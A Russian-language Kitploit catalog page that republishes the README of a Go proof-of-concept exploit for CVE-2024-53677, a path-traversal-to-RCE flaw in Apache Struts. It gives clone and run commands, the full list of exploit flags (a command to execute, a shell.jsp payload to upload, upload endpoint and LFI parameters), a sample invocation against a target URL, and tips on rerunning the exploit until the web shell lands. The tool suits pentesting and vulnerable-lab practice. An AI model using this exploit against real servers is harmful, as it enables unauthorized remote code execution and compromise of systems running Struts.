Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-53677-POC — a proof of concept of CVE-2024-53677 | Kitploit
Инструменты/GitHubGitHub/cythonic1/cve-2024-53677-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubcythonic1/cve-2024-53677-poc

CVE-2024-53677-POC

a proof of concept of CVE-2024-53677

Репозиторий
111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-53677

Старая добрая уязвимость, которая затрагивает Apache Struts и приводит к LFI и удалённому выполнению кода.

Больше информации об уязвимости можно найти в этом отличном блоге.

Обход пути в Apache Struts → RCE (CVE-2024-53677)

Использование POC

Я потратил много времени, чтобы сделать этот эксплойт максимально настраиваемым, потому что, когда я впервые столкнулся с этой CVE, я не нашёл хорошего источника, в котором она была бы корректно реализована. У большинства флагов есть значения по умолчанию, так что не пугайтесь всех этих флагов.

root@kitploit:~
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd  CVE-2024-53677-POC
go run . -h
root@kitploit:~

  -command string
        command to execute on the server default: whoami
  -end-point string
        post endpoint default to: upload.action
  -file-location string
        where to save the file into the server default: what test function return
  -lfi-param string
        Parameter name for LFI testing default: top.UploadFileName
  -payload-file string
        Path to the payload file default: ./shell.jsp
  -payload-file-name string
        name of the payload it self default: shell.jsp
  -payload-param string
        Parameter name for payload injection default: Upload
  -test-file-name string
        name of the testfile it self default: testfile.txt
  -testing-file string
        File used for testing default: ./testfile.txt
  -url string
        Target base URL (format http://strutted.htb/) do not forgot the [/] at the end

У всех этих команд есть значения по умолчанию. Я также реализовал тестовую функцию, чтобы проверять, куда следует помещать файл, и её тоже можно настраивать.

Базовое использование

root@kitploit:~
go run .  -url http://127.0.0.1:8080/ -end-point upload.action

ПРИМЕЧАНИЯ.

Несколько вещей, которые стоит отметить.

  1. Стандартная полезная нагрузка имеет формат GIF, и тип контента — gif; если его нужно изменить, это единственное место, где придётся менять код.
  2. Тестовая функция может дать неверный результат, так что не полагайтесь на неё на 100%.
  3. Вам, возможно, придётся запускать эксплойт более одного раза — как минимум дважды, потому что я заметил, что при первой загрузке полезной нагрузки он не находил её в самом следующем запросе. Так что имейте это в виду.

Вклад.

Не стесняйтесь модифицировать или дополнять эксплойт ♥️.

Ресурсы.

Уязвимый docker-образ Больше информации об эксплойте

Скачать инструмент